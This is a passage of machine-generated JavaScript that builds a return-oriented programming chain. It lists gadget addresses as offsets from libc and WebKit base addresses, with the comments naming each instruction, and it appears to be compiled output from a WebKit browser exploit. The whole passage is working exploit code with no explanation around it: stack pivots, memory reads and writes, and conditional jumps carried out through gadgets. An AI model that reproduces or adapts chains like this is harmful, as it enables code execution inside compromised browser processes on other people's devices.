libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+226224, //L3984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226240, //L3985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+226208, //L3983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3983:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3984:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3985:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+226384, //L3988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226400, //L3989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+226352, //L3986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3986:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3987:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3988:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3989:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+226472, //L3990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3990:
db([0, 0]); // 0x0
//L3952:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+226600, //L3993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226616, //L3994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+226584, //L3992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3992:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3993:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3994:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+226776, //L3999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226792, //L4000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+226728, //L3996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3996:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3997:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3998:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4000:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+226904, //L4001+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+226896, //L4001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4001:
db([0, 0]); // 0x0
set_gadgets([
ropchain+226920, //L4001+24
ropchain+227872, //L3995
libc_base+764760, //pop rsi
ropchain+226960, //L4002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4002:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4004:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+227080, //L4007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227064, //L4005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4005:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4007:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+227224, //L4010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227192, //L4008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+227208, //L4009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4008:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4009:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4010:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+227320, //L4012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4011:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4012:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4013:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+227424, //L4014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+227440, //L4015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4015:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+227616, //L4017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+227632, //L4018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227600, //L4016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4016:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4017:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4018:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+227776, //L4021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+227792, //L4022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+227744, //L4019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4019:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4020:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4022:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+227864, //L4023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4023:
db([0, 0]); // 0x0
//L3995:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+227992, //L4026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+228008, //L4027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227976, //L4025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4025:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4026:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4027:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+228120, //L4029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+228168, //L4032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228136, //L4030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4029:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4030:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4031:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4032:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+228280, //L4033+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+228272, //L4033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4033:
db([0, 0]); // 0x0
set_gadgets([
ropchain+228296, //L4033+24
ropchain+230320, //L4028
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+228336, //L4034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4034:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4035:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L4036:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+228528, //L4040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+228496, //L4038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228512, //L4039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4037:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4038:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4039:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4040:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+228584, //L4042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4042:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+228712, //L4044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+228728, //L4045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228696, //L4043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4043:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4044:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4045:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+228824, //L4047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228808, //L4046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4046:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4047:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+228904, //L4048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4048:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4050:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+229024, //L4053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229008, //L4051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4051:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4053:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+229168, //L4056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229136, //L4054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+229152, //L4055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4054:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4055:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4056:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+229240, //L4058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4058:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+229296, //L4059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4059:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+229376, //L4061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4061:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4063:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+229496, //L4066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229480, //L4064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4064:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4066:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+229640, //L4069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229608, //L4067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+229624, //L4068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4067:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4068:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4069:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+229728, //L4071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4070:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4071:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+229784, //L4072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4072:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4074:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+229864, //L4076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4076:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+229968, //L4077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+229984, //L4078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4077:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4078:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+230072, //L4080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4080:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+230128, //L4081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4081:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+230200, //L4084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4084:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+230256, //L4085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4085:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+230336, //L4087
//L4028:
libc_base+782311, //pop rsp
ropchain+230352, //L4088
//L4087:
libc_base+782311, //pop rsp
ropchain+223984, //L3929
//L4088:
//L3641:
libc_base+764760, //pop rsi
ropchain+230392, //L4089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4089:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4091:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+230512, //L4094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+230496, //L4092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4092:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+230688, //L4097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+230704, //L4098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+230656, //L4095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+230672, //L4096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4095:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4096:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4097:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4098:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+230800, //L4100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+230784, //L4099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4099:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4100:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4101:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4102:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L4103:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+231000, //L4105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4105:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+231056, //L4106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4106:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+231192, //L4110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+231176, //L4109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4108:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4109:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4110:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+231328, //L4113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+231360, //L4115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+231312, //L4112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4112:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4113:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4114:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4115:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+231472, //L4116+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+231464, //L4116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4116:
db([0, 0]); // 0x0
set_gadgets([
ropchain+231488, //L4116+24
ropchain+261088, //L4111
libc_base+764760, //pop rsi
ropchain+231528, //L4117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4119:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+231648, //L4122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+231632, //L4120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4120:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4122:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+231824, //L4125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+231840, //L4126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+231792, //L4123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+231808, //L4124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4123:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4124:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4126:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+231936, //L4128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+231920, //L4127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4127:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4128:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4129:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4130:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L4131:
